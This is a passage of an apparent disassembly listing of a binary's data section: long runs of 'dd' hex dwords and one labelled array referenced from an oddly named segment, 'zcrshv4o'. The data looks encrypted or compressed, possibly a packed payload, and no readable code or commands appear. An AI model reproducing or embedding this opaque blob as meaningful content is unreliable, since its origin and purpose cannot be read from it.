		dd 327740EFh, 5FDC228Ch, 9FAD6FA7h, 0F79CC252h,	401BA39Bh
		dd 0E15C581Fh, 9DA6B098h, 966BA8E5h, 0A86B2C5Eh, 4AD5E771h
		dd 0EA366306h, 57539B02h, 8B4675DBh, 80B2884Dh,	418983D4h
		dd 6660F8FBh, 4A726D9Bh, 0B7147EB5h, 0C6E5ADF4h, 0AE0D9C3Eh
		dd 0D3AA68F6h, 43466DEBh, 491C7C57h, 0D1B1B2AFh, 74AB9EDAh
		dd 0E2C6D27Eh, 0A83AC510h, 54B664CBh, 0BE5F266Fh, 7DCF73Ch
		dd 551A688Fh, 7181ACFEh, 6133D626h, 78BEFEBh, 0D0B5B9EFh
		dd 11261762h, 19B2C433h, 6A156E08h, 0F8DB2461h,	944D4499h
		dd 0FDA86D33h, 0CD401D78h, 77623EC7h, 362CFE12h, 58455488h
		dd 29393A98h, 0AC5D5F4Eh, 1204EA68h, 0BD5F57E2h, 0D1F29F0Dh
		dd 761DA83Bh, 7CC7E3DAh, 0F93555C2h, 0C4734E6Dh, 0AD56254Bh
		dd 56DB8FF1h, 587C682Ch, 3EF77DC2h, 0E373E8A4h,	0D256402Fh
		dd 0A96E8A93h, 0DAEA276Eh, 0FCD927E3h, 0A8AE2600h, 669E55ADh
		dd 0A34B1C05h, 799C655Dh, 0CF0359FDh, 0DF37E9CFh, 0FE2FEAAFh
		dd 97DE5042h, 0A1F2414Bh, 0D51FB1C2h, 0FE977C3Bh, 2A8DD694h
		dd 0CAD4B443h, 0A479D481h, 0EFD3E568h, 391EC41Eh, 5F9F5A02h
		dd 2F7D0445h, 0C2B15EC1h, 0DA23F2EAh, 98D71ABEh, 509D563h
		dd 0BFDFE580h, 0AD776E50h, 0F0BAC1E1h, 0F65DDFCBh, 0D2ED4749h
		dd 0FAC7630Ah, 0B5B9C31Bh, 2C1EE984h, 0A6357FA1h, 373F25D3h
		dd 44FA4F2h, 0E0599362h, 3D80EBF7h, 0D12A3EDAh,	8F215372h
		dd 27C09EDEh, 744B8FF3h, 4B7F2B1Dh, 98D74624h, 71531D65h
		dd 87E3C216h, 264D53ECh, 9F69242Ah, 4B223F54h, 0E1088C81h
		dd 0DE52B413h, 3DD867A0h, 0C3609972h, 0FD60707h, 3874F06Ah
		dd 0AADE3E51h, 7D1CA6F4h, 5703F1B6h, 5D6BB2C4h,	4372F285h
		dd 78F0FF57h, 0D373C3C4h, 66C955FEh, 7398DD41h,	0ADB6B3BAh
		dd 2A859A4Eh, 0F9BB39Bh, 8235EE97h, 0B73568EEh,	0E1412CDAh
		dd 23407932h, 1F5F0992h, 0D159B758h, 0EAC50BBDh, 72BA6634h
		dd 0B81F0923h, 6836AEFAh, 52E62066h, 137964B2h,	6FFF4B92h
		dd 0D4BFC0F2h, 0CBF5A8BCh, 0B7FA060Bh, 0FBF4BDAFh, 3B686D1Ah
		dd 0CC8194CBh, 0C35A5DA5h, 3957AED0h, 0D8A0299Fh, 76A27548h
		dd 0D537138h, 5361FF8Bh, 0DF7D7B63h, 5ABBAE43h,	3B750BC9h
		dd 347A2129h, 0A04C5320h, 64C915D7h, 0FC865772h, 0FC30CC1h
		dd 0A82AD2B9h, 4FECEBE9h, 0F104A7FBh, 10522FC9h, 47B0F66Fh
		dd 44F38027h, 7B18507Bh, 0A6E4B813h, 9E25DB19h,	0E584DBFDh
		dd 0A1C80B83h, 32F3BE99h, 0C74AEC3h, 0ABA3F2FCh, 7A3483CAh
		dd 0DCE2C243h, 2F81382Ah, 6D2F69FBh, 0E857A5Dh,	8F536FE6h
		dd 0B473E37Ch, 0BA739D5Dh, 1759717Ch, 0AE0675E5h, 0D93B71FAh
		dd 549E848Eh, 968E7C22h, 0FBFBF133h, 0A0DDFDE8h, 0E00F10A6h
		dd 0F808DB5Ch, 0A0AC5061h, 1C67E377h, 85C55937h, 396FCCB2h
		dd 8D5D193Ch, 5DCF9961h, 6563EF76h, 0C5AE7625h,	1CCDDCE8h
		dd 0A2BE932Fh, 0C25378E4h, 5DCBE595h, 35CCBAEBh, 0A473F3E1h
		dd 0C4C89F19h, 0DAF9CB78h, 0F2045492h, 0B43C3895h, 3FDCF302h
		dd 55692FE9h, 2FA8F873h, 0BA1A918Fh, 0F568691h,	1237BFD4h
		dd 0FFC9330Dh, 0E769F684h, 991CD596h, 13863655h, 1D3E35FDh
		dd 611FA24Ch, 0FC0F5177h, 0FDDABAF0h, 0F8E72F0Bh, 0BBB3DB0Bh
		dd 0E9B15FB9h, 0F973C60h, 26700C7Ch, 0A4C35B7Dh, 94EE971Dh
		dd 0B4181C6h, 8F8A67B5h, 67B3BEC7h, 0E36B441h, 63764FA8h
		dd 0D6F10AF3h, 0E2A83411h, 0BF575349h, 0F1962EF5h, 4C5F1105h
		dd 0E4BAE341h, 8EC12484h, 0A0BBB217h, 0A9D10AEh, 0CB438EA0h
		dd 74FA8698h, 42791D47h, 3BBFE3BAh, 86B9590Bh, 0E51A5B67h
		dd 5E395DD0h, 0DD053722h, 2A48A625h, 2E4AB897h,	7EE0EB05h
		dd 1AAD7889h, 23CFD788h, 56E09C34h, 0E3AD52B4h,	4708B8CBh
		dd 3EC06BA6h, 1738D31Dh, 5191F663h, 9761B3B8h, 517C7822h
		dd 61CF39CDh, 0FCB98BD1h, 8E968B52h, 2A7521B0h,	9FC0B87Ah
		dd 0DA6CBCA4h, 55B2F848h, 3CB404CDh, 64A9BB8Bh,	0A7335D71h
		dd 59F04C6Eh, 68EFC2C4h, 0FAC695FEh, 80EAC409h,	0F7786155h
		dd 16224931h, 1773131h,	74CB9327h, 25382176h, 913F8776h
		dd 8FEE1861h, 41F5BF0Fh, 0CBC9DE2Bh, 28510FECh,	0C8671484h
		dd 3EBC0AE0h, 0DE664DDAh, 8CED9AF7h, 186CAF9h, 1788BED9h
		dd 0D5A5CA4Ch, 8DAB9665h, 0B656D920h, 70FAE7Dh,	0BCFA7EFDh
		dd 0DE3026ADh, 0FCF8D699h, 8724DE65h, 2F15F29Fh, 4B465C8Dh
		dd 0FF8C3D0Ch, 0ECA06675h, 0E7231699h, 0C3394A22h, 0ACE683C2h
		dd 89F676D7h, 1B7E369h,	9AE47399h, 4A677C1Ah, 3AB24D60h
		dd 547A75B6h, 0D27B8643h, 0A31987CBh, 7906DD9Ah, 93B2E40Bh
		dd 0F68EF0A1h, 9ABD5B29h, 3691CAAEh, 3B6A5E86h,	54FA5E17h
		dd 0FAD16377h, 0DB723222h, 0E9965260h, 0CAA3B8EBh, 0B4326C2h
		dd 0AC4B3A3Fh, 6D8ABA8Fh, 0CED861DDh, 7A716F92h, 0B6AA5766h
		dd 0DF4F93A3h, 0B1C0DAFAh
		dd 0CBE01886h, 6D45DF0Ah, 0E0A16CD6h, 0CE3BF2B8h, 37F4671Ah
		dd 71334FCh, 0EF5ABB3Eh, 0C9224E9h, 0F55E0987h,	0C1F8F944h
		dd 1BC9D1CDh, 63B0D789h, 9B8FBA69h, 375DB6BBh, 3F1CF22Ch
		dd 32D2B83Ch, 761D6039h, 12B8CF7Ch, 0F9823058h,	8B531E35h
		dd 64DA9531h, 0BA425365h, 3CB1BB8Dh, 9EDB3F4Eh,	0AC62AA2Eh
		dd 0E1946563h, 343F00B3h, 3A0F7EE9h, 0CB5D07DFh, 13D8FFCDh
		dd 8A4DB43Fh, 1D59BD2Fh, 93730D25h, 8393B97h, 4742019Ch
		dd 0A7B3C95Bh, 32CE93E6h, 0D7F9447Eh, 7A372AC7h, 31CC1393h
		dd 4AF13E9Bh, 0B4711ABEh, 723E8BFAh, 0BA4D40BCh, 0E544F244h
		dd 0AE5D98D1h, 0F0BF5AC5h, 7EE957CAh, 0E383B340h, 0C13932DBh
		dd 0F29CB565h, 7DFB23A6h, 0EEA4FE5Bh, 65F7E9E2h, 81E76A4Eh
		dd 7A47A3BFh, 0BDA2EB20h, 0BA80D275h, 658135C9h, 6DB5D523h
		dd 7FB6F349h, 7DD4D99h,	0A23BDEC7h, 17E30186h, 3C284FFCh
		dd 0A9E14664h, 0DB8BDE75h, 94345495h, 0F187E375h, 401AFE2Bh
		dd 5F59DD35h, 66E9B167h, 0F46FB069h, 0C73FD70Fh, 7968E28Fh
		dd 312CE89Eh, 0EBD2BB7Eh, 7FE66A1Fh, 13E15FACh,	59CB94EBh
		dd 51939E8Ah, 936A445Bh, 6FF2B834h, 0A8A1709Fh,	0B17CBE7Bh
		dd 48D67572h, 25DD647h,	1795029Bh, 5F67094Ah, 45E1EEC8h
		dd 0C8B6AF0h, 0E1BB9785h, 0D68F7353h, 62F1F685h, 0C1C4A6DDh
		dd 50813AD5h, 0E367E2E8h, 576EF54Ch, 0A7E5B126h, 0AAAECDBFh
		dd 36CD9C25h, 0E4CBAF2Ch, 559E758Bh, 18D97807h,	0B3883F3h
		dd 0E72963DAh, 0D7D2F7AFh, 199F8D44h, 2B429749h, 9DD6124Ah
		dd 5F75B47Ah, 0B4377928h, 1CB64D71h, 0BF7424AAh, 89738908h
		dd 0AC589C99h, 5B44BDFDh, 3504E07Ch, 0D5BBD5FFh, 0EDD7904Fh
		dd 24A35395h, 8EACF278h, 239D1F72h, 0C1E633B7h,	4B7868DAh
		dd 7415B435h, 876A8C75h, 0EED59665h, 0C060429Fh, 0FB7ECE5Ah
		dd 6451D4ECh, 0AB5EEF4Bh, 0F6E57019h, 0A8D4DB46h, 3D72D8A9h
		dd 0F15B117Eh, 0A2BCAC5Fh, 0BE649E97h, 772C24CEh, 5D7CE3EDh
		dd 2E9937BEh, 0C80C3F0Fh, 45F2BF5Dh, 0B928F56Bh, 78C6EBF7h
		dd 0C1A01D5Dh, 355807CBh, 0C167C460h, 32A69AA6h, 0B481D59Ah
		dd 5F49ADBBh, 2BDD92D1h, 590814AFh, 587EE9D1h, 4377B49Bh
		dd 3C520BB9h, 0EF7DCDE8h, 0CBA5DBF1h, 0D762F3D1h, 0BB88BE67h
		dd 0B3C02939h, 0AE7C7E2Fh, 0BFA9710Ah, 0BAF0E468h, 0AA957742h
		dd 0B24F57D5h, 0DB58356Eh, 0C5D629CBh, 0C963A281h, 128A55C4h
		dd 932FFC2Dh, 4CFEAD38h, 548CA319h, 3F742AFFh, 5D584A09h
		dd 0AF3B85D6h, 44574645h, 83F2B1E0h, 2ED31C91h,	0EFF4C967h
		dd 0FED8B9AEh, 3EB4F2A5h, 98B5AEBEh, 699E9C3h, 0B8165720h
		dd 6E7B415Dh, 6714E066h, 7DD2C0F7h, 8E7AA9D3h, 1D9FAAFCh
		dd 0E8C5F949h, 0A2955F16h, 29BFAD87h, 937962EDh, 3FEF16D2h
		dd 5A77E415h, 4554F317h, 63564D59h, 0BDA6645h, 0DEBF82E6h
		dd 4B233A16h, 250535F8h, 0D8F6188Bh, 0D719A8F8h, 0E0947C22h
		dd 0FA3F0AECh, 7E96E2ABh, 15D14DCAh, 0A858CCF4h, 0F699EE6Dh
		dd 7EF964B8h, 63F46050h, 0BB541ADDh, 0A41A0A8Eh, 0AFC18E62h
		dd 0C0B81FF3h, 55CE498Ch, 1BCFF42Dh, 3EB8D4ADh,	2B55044Ah
		dd 6AA12397h, 0BC072D73h, 67FB57B5h, 906A62D1h,	7361229Fh
		dd 68BFEF47h, 280BB864h, 52865F9h, 0F911707Dh, 59DA9CA7h
		dd 7C3B393Dh, 475EB72Fh, 0A62CD5EBh, 0A8D771F1h, 0BD82529Ch
		dd 94F4A68h, 0CA435E08h, 765DA2EFh, 4C74129Fh, 68BD7ECCh
		dd 4ECB86A3h, 0AED8F9FAh, 4F5B1E1h, 0F7E978CAh,	0DC121397h
		dd 30CC4AF9h, 47BC70D6h, 0B98BD4A6h, 79FD72B8h,	3A1BFA21h
		dd 0BDDC38C6h, 0B4E9B44Eh, 8F2B4CF8h, 977D3371h, 426AB874h
		dd 301878BCh, 0FA0CBA6Ah, 0C5724BB2h, 0B334797Fh, 0E87E4713h
		dd 0FC355291h, 1E2818A2h, 8BF7219Ah, 92418E22h,	0F4D162A6h
		dd 781C081h, 0E05A6ABFh, 0CD7719CEh, 362C1908h,	89DD4A15h
		dd 9751E726h, 10DBA6EBh, 0BB766CB8h, 0EF9E478Ch, 0B03C297Bh
		dd 4EB3E7C3h, 699B6986h, 7C099154h, 2F9F5565h, 775426E1h
		dd 3977417Eh, 0F9F0AB5Ah, 3B122E73h, 0C92A9A18h, 227AF5AEh
		dd 6F2AB2B1h, 0DDFBE4F7h, 9FA0A668h, 19CC52FCh,	6C557EE0h
		dd 0BE3E3944h, 0A503192Bh, 0F15015BFh, 0CA90FD97h, 22F0E79Bh
		dd 0A2BF1874h, 785FDD75h, 0C8C0151Dh, 5E79E627h, 72E1F06Eh
		dd 769B5F49h, 0D79AEB46h, 716F41D7h, 0BF3B7021h, 94EF95B8h
		dd 725FE1EDh, 4E4C5560h, 0F84FBB9h, 0F9AEEEAFh,	886E17F8h
		dd 0BC5C3B0Dh, 0CD546F2Dh, 63A692B2h, 0F4563295h, 0F097E0ABh
		dd 4A667FB5h, 0D1251BAh, 9E93E6D9h, 0ABC6CDA7h,	9774BDACh
		dd 50C409F1h, 0E4CE7890h, 0E7E7BD6Ah, 0F85D5D37h, 0E86D0FC1h
		dd 0F4629AE6h, 55E05718h, 7E0B54DBh, 50A97398h,	6E2E5B86h
		dd 0C1E63CBEh, 0FD2BCF01h, 55EC714h, 0B9B259FFh, 281B2B8Bh
		dd 0A311DC4Fh, 644EBFEDh, 1F8CCB50h, 0DC78DC66h, 54AEAD7Eh
		dd 3EA38E8Ah, 4182A9ECh, 0D5E7DCD7h, 50FAE2D6h,	349AE8D1h
		dd 10734E11h, 316C7AA1h, 757FF7D3h, 0ABBDFCD3h,	4D1BB51Fh
		dd 0A8488574h, 8D90E97Eh, 4FF8AB4Ch, 996979B5h,	0B8903B9Ch
		dd 2D3B7BFAh, 4D6AE28Ch, 94BD3B5h, 0CF7A6303h, 0E0DFA909h
		dd 0FA1F598Bh, 0A1DDCBF3h, 0EBFC8F5Ch, 9DD465B2h, 58E030E7h
		dd 0FC5F22D1h, 0D699B4D1h, 0AA35C257h, 52BEF38Bh, 0CC19B45Bh
		dd 999796C8h, 969A0A87h, 479DAFF6h, 497689B7h, 0C0F1689Ch
		dd 24F1D661h, 5E7866B5h, 24BBC5FEh, 69ACEF13h, 0D46DE460h
		dd 0A592F33Eh, 0C026E9CEh, 29185F4Ah, 8DC8FF8Bh, 88BE5357h
		dd 657C03F2h, 5CCCC2D2h, 1D8D1236h, 4FFAE5A2h, 0E1ABC806h
		dd 298A3163h, 4699A952h, 695300CBh, 0B8B7171h, 75972C07h
		dd 98E4218Dh, 35757284h, 8AEEA5DBh, 6A5533BCh, 554A1B77h
		dd 47258DFAh, 0F9B1DCFDh, 1EE62CAEh, 0F5B3DD1Bh, 637956E9h
		dd 0AAC83526h, 5FE2C183h, 0F1D8F9AFh, 6FA69EB6h, 0D754833Dh
		dd 6FBC1F12h, 23ABD496h, 0CB50AD9Ch, 8FF3B78Eh,	0C9B5E29Dh
		dd 31E55A2Ah, 0DD9A9156h, 15F29873h, 9572FACEh,	42F202A8h
		dd 6529B25Bh, 943FBED2h, 8E517B3Fh, 5B0380A3h, 4F3D2835h
		dd 8562C3DCh, 91241F13h, 52A15B37h, 5B7356B6h, 8B8852B4h
		dd 0B9FA34EEh, 0AFAD9926h, 0C1C5DEF3h, 1C62C575h, 704545CBh
		dd 99877ACFh, 98984220h, 0E549EF56h, 4AC3A7Ah, 0F349FD94h
		dd 0D9DD6AA5h, 0BB79F3CDh, 16BE99ABh, 1CBC684Bh, 7813901Ch
		dd 72716D3Bh, 6457A671h, 62A4768Dh, 21989F26h, 61B1817Ah
		dd 1B5F7C74h, 7097CB23h, 6A9E0F19h, 0AF5AB692h,	31BB2FBCh
		dd 0DDAAE407h, 0DD07BDBEh, 0B6342C4Bh, 42FED2E7h, 27EB2BC1h
		dd 0ECC794Fh, 0BF254B03h, 0C8D2DB4Ch, 965CA465h, 90ADA2ACh
		dd 0E48509ABh, 17B77462h, 7896F8ECh, 0B09883E9h, 0DE2D2CAAh
		dd 0E21291EFh, 6939E162h, 279BC0F8h, 0F50F2A29h, 86336AD3h
		dd 811B5644h, 31058947h, 57394AAFh, 7C3D595Bh, 2FD05C55h
		dd 5BC0F094h, 0FF9E67F7h, 703CFDE0h, 2B3BD6F0h,	79FD90D8h
		dd 0C0C227BEh, 0F967955Dh, 0CF5EEBD6h, 2A9319D2h, 5A5C6D61h
		dd 1B752B82h, 0AEF3559Fh, 8A55D8E1h, 6C29E96h, 73395DA1h
		dd 0CF5AC89Ch, 20E646DCh, 8B5C310Ah, 3ED21FA1h,	8ECCEEEFh
		dd 4F9B1F84h, 0B9799B79h, 0AA53C5EDh, 0F3038CA8h, 9F8DB4BAh
		dd 2BF3F53Fh, 0AD97D28Dh, 5BA81C2Eh, 0AF02312Ah, 8B717E9Fh
		dd 0BA30EE8Dh, 215FEA6Ah
		dd 8FA1D5A3h, 0CCECDB3Eh, 0D164D254h, 1626A5FAh, 0D089F9BDh
		dd 600D0A3Eh, 7EAF15F4h, 9129782Dh, 3BFDAD6Fh, 0E0797E20h
		dd 4539D1E5h, 0D5B6586Ch, 685CA053h, 0A7E7E3FAh, 77E52915h
		dd 0C9EE9B26h, 9F32D2B5h, 0F5EEAAB7h, 123F988Eh, 9ACF56FBh
		dd 8D6FD2EBh, 0F3535A2Dh, 57E1B6E7h, 5A5789FDh,	40C7C4EFh
		dd 28ED96D3h, 672CCB5Fh, 0A9E6B44h, 0FB31BE1Eh,	7F2A27C2h
		dd 0B9D5472Ah, 0F9D75317h, 772875A4h, 3864284Eh, 6DCFEBE1h
		dd 215B28A4h, 5DCAFFDEh, 99BEC552h, 0CA2C5827h,	0CAB269E8h
		dd 0AACDED0Ah, 5E2E2A44h, 0FB74F69Eh, 0B92893D5h, 1F1E36D8h
		dd 0FC2CD60Fh, 750EA6AAh, 0C6578E2Dh, 35A7FB0Fh, 6EEA3F2Bh
		dd 0DBE88F91h, 373AE952h, 514819ECh, 9028277Eh,	4832B2E6h
		dd 0DCEE82D4h, 0F972FF1Bh, 0B9F4DD44h, 96EE35A3h, 5479A263h
		dd 6B496818h, 3AE56B4Eh, 0E0FF183h, 4DC5089Fh, 0BDB9A2ABh
		dd 0A13966D8h, 87EB1BBAh, 7D25DB14h, 0AD6F8E10h, 2D4A059Ah
		dd 5A7387E2h, 0A4B4C04Bh, 0D30C8359h, 3D231EEh,	3ACF7667h
		dd 0AB1BCDBh, 2BFA97FDh, 0E8C454ABh, 36DF23BCh,	7821362Fh
		dd 0D4B00272h, 51929194h, 0BB659A3Ch, 0D2CE796Ah, 0DB9C07B9h
		dd 0AA74246Ah, 7653663Eh, 2E8A8D50h, 7FAFA55Dh,	0DB5BAF25h
		dd 11BCA95Eh, 0BF8BF126h, 29721606h, 89DB946Eh,	0DF7B3EFFh
		dd 517249BFh, 4CE243A9h, 0E9C5EE03h, 0AE7212D4h, 0D0CD65FDh
		dd 422A5FC2h, 41B697BAh, 2468CAD1h, 0BB70E57Dh,	0E250F72Ah
		dd 3F12B6B8h, 87844DE4h, 0ABEE45DDh, 25426A5Dh,	0F6C6EC90h
		dd 2FD516BEh, 0F9FECBFBh, 5DF537A0h, 0B6AFA3FFh, 0CA0AB61Ch
		dd 0F26F2AACh, 728C2494h, 57181EFh, 0FCEDF078h,	0BBB1F04Ah
		dd 0B87959B1h, 68DF1118h, 0C2F29CFEh, 0FA1539CDh, 33935990h
		dd 4C6798Ah, 3C3F4507h,	0D4A2F6F7h, 822D8574h, 1DA41D2Eh
		dd 598A810Ah, 0DD272F39h, 2E7F3DE8h, 4FCD7637h,	39B24E55h
		dd 8F401735h, 68D974A0h, 0FFA57044h, 9DCC6E2Ah,	19E34A41h
		dd 0B6F2DD2Dh, 0FBAA6D3Eh, 8F831A6Eh, 9CDE14FAh, 4D75021Dh
		dd 0C5D7877Dh, 0B466BB9Ah, 88920D94h, 4D9EFA99h, 0AD20AD97h
		dd 3894D535h, 5BBBD7A9h, 2E619CD2h, 68BD1949h, 0BD8F5B6Dh
		dd 4F510ED1h, 611242EBh, 79645Bh, 0CDCB89B1h, 0E924F114h
		dd 8B25D384h, 449D16C0h, 25828A73h, 9936E290h, 0B2A0A3D6h
		dd 0AA750AABh, 84D6462Ch, 0AE984967h, 0AF1AA6Ch, 0FAE1E3BBh
		dd 7E77F3Dh, 0BFD6DAEAh, 5DF5F8BDh, 0E839C5FBh,	34580BA8h
		dd 6EE1F3F2h, 0C516D8FEh, 572A7560h, 97499667h,	4FE2FF81h
		dd 357B181Eh, 57624A1Eh, 177985C3h, 0CDDE71CBh,	0AECDDBACh
		dd 0C52E100Fh, 82774CD8h, 57EA5B99h, 0D6EB166Eh, 4DE38115h
		dd 42959054h, 7175D9BAh, 97D19AFEh, 5EDF40C9h, 0BA430C4Dh
		dd 78DF03E2h, 85D25B0h,	247EEF0Fh, 64BFB0Ch, 0BF0DB87Eh
		dd 33AEB165h, 0CD4670AEh, 80C49785h, 0B6C7C6AEh, 9798E936h
		dd 0F50798A8h, 0ECCA5F6Fh, 0D63D5E7Eh, 6F83AC67h, 0BD8FD5BFh
		dd 7D1EFBABh, 4CB6D1C5h, 50BAA097h, 0A3FC2684h,	1C42AB13h
		dd 6E352A1Ah, 51F0CDEFh, 0EEE28A9Fh, 0DDBFEA24h, 0D3CA1995h
		dd 79C20F03h, 0C1EDDB60h, 0DA58FF09h, 9F65FCBDh, 0ACB3E93Bh
		dd 9AA5129Ah, 28EF54FDh, 307B1E9Fh, 5DDABFE9h, 0A8B8AB2h
		dd 693DA665h, 77AAB0CDh, 0EA55AEAFh, 95212F7h, 0FC54F8D0h
		dd 0F719BCF0h, 1BCB55D1h, 0FD898A33h, 0DE1D1FE1h, 8D961531h
		dd 0EC655A8Fh, 39E038A7h, 2064ED77h, 0BD99946Ch, 68E9BC8Eh
		dd 2953F2EBh, 0F2B00489h, 0BC565FDFh, 28F9771Bh, 0B50919DAh
		dd 21859A81h, 51A616CFh, 0A8E62D7Bh, 0A06E4D2Dh, 0C2DE024Eh
		dd 495417C3h, 0A5ABF48Ch, 0F173A33Ch, 3901BB19h, 10DBA897h
		dd 217A7D9Fh, 0B75BB807h, 5D380A17h, 0C6F70089h, 7248568Fh
		dd 0DB771360h, 808E3C77h, 0D603C0BFh, 7AED6ECDh, 0CEE50CE6h
		dd 206E1408h, 46BCD050h, 0A218A0D6h, 2D580BB9h,	0DAAED97Fh
		dd 38FC9268h, 51BE8853h, 0B1D783B1h, 63CA2168h,	56431A7Bh
		dd 0FBAFC9Eh, 78F5F68Ch, 0A6131671h, 0D2BA0D44h, 8FDE6120h
		dd 0B6B67024h, 353B7FEFh, 77C241D7h, 44DBAC69h,	0FFC5789Fh
		dd 0B00BCBBBh, 0CC156218h, 0B0B61DF3h, 616C9DF7h, 823B8A55h
		dd 80BFC21Ch, 1F838B6Eh, 4FAE028Bh, 237DE99Dh, 0E373B5E1h
		dd 0E1D5089Ah, 0C3F147E0h, 79871EE4h, 0B447327Bh, 0BD2469BAh
		dd 269CEF2Dh, 61B493EAh, 11C9C569h, 0E7EB3E85h,	0FAE7CA92h
		dd 0C8A1703Dh, 0EE6A0ED8h, 0BDA21854h, 0B7E1262Ch, 0D6C5D386h
		dd 64F4EB0Ah, 0EA61F0CBh, 99B2EAD0h, 95AA76F3h,	0CD1DA056h
		dd 4E265707h, 4F4F040Bh, 0EE6E92B1h, 0C117B0Bh,	0CAE973E9h
		dd 5B45718Bh, 0E188667Ch, 0DB9D4641h, 82568787h, 6B31E6CCh
		dd 6A19FCE7h, 3F8A4AA4h, 0F45F4238h, 0AD61CC47h, 6178C3D3h
		dd 0D5F4F3A0h, 0FDEAE46Fh, 97FE7512h, 0A69685FCh, 97BB5959h
		dd 0E3D70357h, 0D0575333h, 4CC5D542h, 0B3B78AD2h, 0AE40B92Fh
		dd 0B7AE1890h, 113BE4BFh, 1E07336h, 20E2BB84h, 0B7FBCDD5h
		dd 4BFD6940h, 0E79BDA47h, 0BD57C8E7h, 73A8A798h, 8BA1DC5Dh
		dd 4E74D4CCh, 78554F28h, 6E662130h, 7786A27Fh, 7BF811ADh
		dd 69F143CAh, 50CD7224h, 49AE2C3Eh, 0A24A5B1Ch,	90FCD6D6h
		dd 94C9F61Fh, 2A274612h, 5C632B49h, 4A19303Bh, 61B75307h
		dd 4FAEB0ABh, 0A716F75Dh, 0D86BECA4h, 0B0439AB3h, 8F9A1FF2h
		dd 0E9AD7B85h, 0B447831Bh, 0A0E957CAh, 86876979h, 1485B0B5h
		dd 9B2907C5h, 0FF51FF58h, 0B4911889h, 1AD543A5h, 0E2A09792h
		dd 7C1B5287h, 0B98DB3D7h, 9DD7C3D3h, 35F7989Ch,	9FAA07E2h
		dd 67D90409h, 55D1AD1Bh, 0E5213215h, 0D04A828Bh, 776CEEA3h
		dd 5E4EE453h, 197B1A9Eh, 19577A8h, 737B1AADh, 5776B98Eh
		dd 1184EDC5h, 0CD47605Bh, 0AF7F9C05h, 18A01E5Ah, 97C1840Fh
		dd 698ADCDFh, 586722D4h, 9BF4955h, 20371FC3h, 0D1E6D4A8h
		dd 1E544715h, 0D7F4AA18h, 0D8B2470Bh, 0B867628h, 0DFF778D9h
		dd 0E10B11A2h, 0A656DB50h, 0F97325C2h, 0DCFD9D74h, 0E68BB58h
		dd 0F1CFA63Fh, 84AFA6F3h, 934ABC4Fh, 5D8C3EE5h,	327E9D14h
		dd 356AF4FEh, 0C47360F7h, 5CF7497Fh, 91F70851h,	65080DE7h
		dd 2A8A8286h, 32B4C061h, 172FDD83h, 0EF906FFDh,	0C8D54D7Ah
		dd 0D88255EBh, 36BF68FEh, 71E9FFBDh, 0E489637Ah, 7FE59F30h
		dd 0F7194E94h, 0D7D42B64h, 8536C5FDh, 8966D24Bh, 2AEF06B5h
		dd 213AD56Bh, 0E7ED7659h, 7A6485C3h, 8D8E8FA2h,	96079049h
		dd 0F683B0BBh, 729B7AEFh, 106EB496h, 0C162BD28h, 0D2B8D739h
		dd 29A5553Ah, 264AFF6Eh, 9D8E5890h, 5AB5F0AEh, 94E57099h
		dd 9778AE60h, 0E8076469h, 425B9867h, 0D3440056h, 1CB603F7h
		dd 0C1E4EF2Fh, 0D8430EB9h, 166C459Dh, 8127A1DAh, 91ED0E04h
		dd 0C4949D04h, 54FA17D6h, 0CDD15DD0h, 2DAF68h, 0E0F03593h
		dd 728E8C15h, 0DBF1E19Fh, 1DCC66F9h, 12D5D46Dh,	0F7EBF667h
		dd 0F9318150h, 19CE61A5h, 0E7DDCE8Eh, 2D3726F1h, 8341473h
		dd 8F5E5D50h, 9CD7BF8Fh, 6DD066FDh, 3B462E5Ch, 0F94430A7h
		dd 1FCF31CDh, 1DDE3338h, 2C4B00F4h, 89EF6B86h, 28EB43C4h
		dd 20D6DB54h, 2F120CE0h, 0F7ED670Dh, 0BB4DCF8Ch, 6F818B84h
		dd 0FE25A16Ah, 0C6FEDFA3h, 0EFD96E7h, 8BD5F68Eh, 6F85B914h
		dd 642F303Ch, 0FF67DA39h, 514EE6E8h, 37027136h,	6B4405B2h
		dd 4F20511Dh, 0C3C75D51h
		dd 0F680A81Ch, 0A8FFF5D0h, 0D1AFD8B4h, 0FCE4AED7h, 74B5458Bh
		dd 0C70D1F8Dh, 0DD609AF3h, 35E5EA7Dh, 5609D029h, 8DA9711Dh
		dd 97BED3DDh, 72BEDA33h, 0DDBC8F09h, 0B3E92F55h, 6136C999h
		dd 72F7846Eh, 0D0BB84F1h, 3775535h, 0C10B42A7h,	984E71BEh
		dd 0C3CF827h, 0AFFD7F88h, 6869D63Fh, 7342DA16h
dword_484560	dd 0D92535D9h, 78BEEF9h, 0F1F6708Fh, 5F6A11C0h,	0BD371F4Dh
					; DATA XREF: zcrshv4o:off_41F864o
		dd 0CF0AD101h, 56313498h, 0BE0A234h, 0AB8F2EAFh, 75A944D0h
		dd 61A5086Ah, 9A6F70FCh, 6692DF1Eh, 16AA4A6Ah, 0B6960F45h
		dd 0A30D83A2h, 0B5A35825h, 91F8F763h, 48D90C91h, 0FD441F3Ah
		dd 0AE9CC9DDh, 648967ECh, 863D9AD4h, 0EE47E46h,	0C54B1BC8h
		dd 8CC6F3A8h, 0D7C86579h, 9AC41BD8h, 0C539B21Ch, 0D769734Eh
		dd 9C1DE1D0h, 97C6AC7Bh, 0EEDC7E03h, 3F5D2FF1h,	0E37D49BDh
		dd 44B0AEC6h, 5737EDCCh, 44DE3DEAh, 0C0B05A5Dh,	2A378B21h
		dd 0F687FF91h, 0FC75773Bh, 177AE0ADh, 0FEB64B05h, 5EFE742h
		dd 2FEA520Eh, 0BDB2F65h, 2315CB50h, 3C1180C3h, 457693BFh
		dd 524A7833h, 10C5B268h, 0F8B8AF95h, 68491C2h, 89855033h
		dd 8B5B421Fh, 1AC18604h, 8C8A5698h, 78BFEE31h, 4E6137EFh
		dd 7E45A694h, 0B53430FCh, 0A12D4931h, 0EE9AC5C8h, 0B3671709h
		dd 40B196A6h, 0BE0344C2h, 4AE8C2CBh, 3F01051Bh,	0BF37E9A4h
		dd 0CB0B678Dh, 336049C9h, 989133B5h, 0E5BBB6CBh, 995E47CBh
		dd 74EACCB1h, 4FE18752h, 514DE3BEh, 0AC2E0ECCh,	6FE076AFh
		dd 0F1BE331Fh, 1554F2E0h, 701FC43Fh, 317DFBA8h,	0DFE93A1Fh
		dd 9E292D0h, 0C94BA0A3h, 0DC1FAD3Ah, 0AB8162FAh, 0ED5B2C42h
		dd 7FCEE6FEh, 295E1C29h, 3EF1B24Fh, 20BE1468h, 5FB094B3h
		dd 7DC0856Ah, 0ECAAE169h, 993BBF19h, 0A8F9A024h, 1D76F298h
